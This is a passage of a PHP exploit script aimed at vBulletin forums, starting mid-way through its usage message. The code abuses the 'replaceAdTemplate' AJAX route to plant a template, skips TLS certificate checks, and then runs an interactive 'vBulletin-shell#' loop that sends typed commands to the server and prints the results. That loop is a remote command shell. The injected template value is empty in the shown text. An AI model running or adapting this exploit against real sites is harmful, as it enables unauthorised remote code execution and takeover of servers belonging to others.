\n"; print "\nExample....: php $argv[0] http://localhost/vb/"; print "\nExample....: php $argv[0] https://vbulletin.com/\n\n"; die(); } $params = [ "routestring" => "ajax/api/ad/replaceAdTemplate", "styleid" => "1", "location" => "rce", "template" => "" ]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $argv[1]); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); if (curl_exec($ch) !== "null") die("\n[-] Exploit failed, unable to create template!\n\n"); $params = ["routestring" => "ajax/render/ad_rce"]; while (1) { print "\nvBulletin-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $params["cmd"] = $cmd; curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); preg_match('/(.+)\{"template":/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); }